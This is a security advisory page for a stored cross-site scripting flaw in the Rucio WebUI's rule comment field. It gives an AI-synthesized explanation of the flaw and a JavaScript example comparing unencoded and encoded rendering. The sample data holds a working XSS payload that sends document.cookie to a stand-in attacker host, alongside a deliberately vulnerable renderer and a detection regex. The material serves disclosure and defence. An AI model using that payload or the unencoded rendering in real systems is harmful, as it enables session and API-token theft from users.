Rucio WebUI Vulnerable to Stored Cross-site Scripting (XSS) through Custom Rule Function
Description
Rucio is a software framework that provides functionality to organize, manage, and access large volumes of scientific data using customizable policies. Versions prior to 35.8.3, 38.5.4, and 39.3.1 have a stored Cross-Site Scripting (XSS) vulnerability in the Custom Rules function of the WebUI where attacker-controlled input is persisted by the backend and later rendered in the WebUI without proper output encoding. This allows arbitrary JavaScript execution in the context of the WebUI for users who view affected pages, potentially enabling session token theft or unauthorized actions. Versions 35.8.3, 38.5.4, and 39.3.1 fix the issue.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Rucio WebUI Custom Rules function has a stored XSS vulnerability allowing arbitrary JavaScript execution via attacker-controlled input.
Vulnerability
Rucio, a scientific data management framework, contains a stored Cross-Site Scripting (XSS) vulnerability in the Custom Rules function of its WebUI. The root cause is that attacker-controlled input, specifically the comment field supplied when creating a rule, is persisted by the backend as-is and later inserted into WebUI pages without output encoding. When the rule is later viewed or approved, the stored script executes in the WebUI origin [2][3].
Exploitation
An authenticated user can inject a malicious payload into the comment field during rule creation (e.g., via POST /proxy/rules/). The payload is stored and later rendered without sanitization. The script triggers when any user views the rule (e.g., via Monitoring > Subscriptions and Rules > Show My Rules) or when an administrator approves it (Data Transfer > Approve Rules). No special privileges beyond standard authentication are required to create the malicious rule [3].
Impact
Successful exploitation allows arbitrary JavaScript execution in the context of the WebUI for any user viewing the affected page. This can lead to session cookie theft (if the session cookie lacks the HttpOnly flag) or unauthorized actions performed on behalf of the victim. The impact is amplified by API tokens that the WebUI exposes in JavaScript variables: HttpOnly does not protect those, so an injected script can read them directly and use them against the Rucio API as the victim [3].
Mitigation
The vulnerability is fixed in Rucio versions 35.8.3, 38.5.4, and 39.3.1. Users should upgrade to these patched versions. The OWASP XSS Prevention Cheat Sheet provides general guidance on preventing such issues through proper output encoding and framework security practices [1][2].
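The following is an added example, not code from rucio-webui or the advisory. It models the pattern described in the Vulnerability and Exploitation sections: a persisted rule comment interpolated into WebUI HTML without encoding, beside the hardened form that applies HTML entity encoding in both the text and the attribute context, plus a triage helper that flags stored comments carrying markup (useful after upgrading, to see whether a payload was ever planted). The rule objects are constructed sample data; the field names (`id`, `scope`, `name`, `comments`) follow the Rucio rule dictionary, but the rendering functions and the payload are illustrative assumptions, not the project's own code.

```javascript
// Added example (not rucio-webui code). Demonstrates stored XSS via an
// unencoded rule comment, the output-encoding fix, and a triage check.

// Constructed sample rules as a "list rules" call might return them.
// The second comment is a constructed XSS payload: it exfiltrates
// document.cookie to an assumed attacker host when the image fails to load.
const SAMPLE_RULES = [
  { id: "rule-0001", scope: "user.alice", name: "dataset1", comments: "nightly copy" },
  {
    id: "rule-0002",
    scope: "user.mallory",
    name: "dataset2",
    comments: '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">',
  },
];

// Minimal HTML entity encoder. Covers the five characters that matter in
// HTML text and in double- or single-quoted attribute values.
const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// VULNERABLE: the stored comment is concatenated straight into markup, in
// both an attribute (title) and the text of the cell. Any <tag> or
// on*=handler in the comment becomes live HTML for whoever views the row.
function renderRuleRowVulnerable(rule) {
  return `<tr><td>${rule.scope}:${rule.name}</td>` +
         `<td title="${rule.comments}">${rule.comments}</td></tr>`;
}

// HARDENED: every untrusted field is entity-encoded for the context it lands
// in. Because the attribute is quoted and quotes are encoded, the same
// encoder is correct for both the attribute and the text context here.
function renderRuleRowSafe(rule) {
  const did = escapeHtml(`${rule.scope}:${rule.name}`);
  const comment = escapeHtml(rule.comments);
  return `<tr><td>${did}</td><td title="${comment}">${comment}</td></tr>`;
}

// Triage helper: returns ids of rules whose stored comment looks like markup
// or script (tag start, javascript: URL, or an inline event handler).
// A match is a lead to inspect, not proof of exploitation.
const SUSPICIOUS = /<[a-z!\/]|javascript:|\bon[a-z]+\s*=/i;
function findSuspiciousComments(rules) {
  return rules.filter((r) => SUSPICIOUS.test(r.comments || "")).map((r) => r.id);
}

// Stand-alone demonstration.
for (const rule of SAMPLE_RULES) {
  console.log("vulnerable:", renderRuleRowVulnerable(rule));
  console.log("hardened:  ", renderRuleRowSafe(rule));
}
console.log("rules to inspect:", findSuspiciousComments(SAMPLE_RULES));
```

When the WebUI is built on a templating framework, the equivalent fix is to rely on the framework's default escaping and never route user-supplied strings through `innerHTML`, a "safe"/raw filter, or string-built markup; the encoder above is the minimal form of that rule. Note that encoding is context-specific: a comment placed inside a `<script>` block or a `javascript:` URL would need a different treatment, which is exactly what the OWASP cheat sheet cited under Mitigation walks through.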
AI Insight generated on May 19, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected packages
Versions sourced from the GitHub Security Advisory.
| Package | Ecosystem | Affected versions | Patched versions |
|---|---|---|---|
| rucio-webui | PyPI | < 35.8.3 | 35.8.3 |
| rucio-webui | PyPI | >= 36.0.0rc1, < 38.5.4 | 38.5.4 |
| rucio-webui | PyPI | >= 39.0.0rc1, < 39.3.1 | 39.3.1 |
Affected products
- rucio/rucio: range < 35.8.3
Patches
No patches discovered yet.
Vulnerability mechanics
AI mechanics synthesis has not run for this CVE yet.
References
- github.com/advisories/GHSA-rwj9-7j48-9f7q (GHSA advisory)
- nvd.nist.gov/vuln/detail/CVE-2026-25733 (NVD advisory)
- cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html (web)
- github.com/rucio/rucio/releases/tag/35.8.3 (web)
- github.com/rucio/rucio/releases/tag/38.5.4 (web)
- github.com/rucio/rucio/releases/tag/39.3.1 (web)
- github.com/rucio/rucio/security/advisories/GHSA-rwj9-7j48-9f7q (vendor advisory, confirmed)
News mentions
No linked articles in our index yet.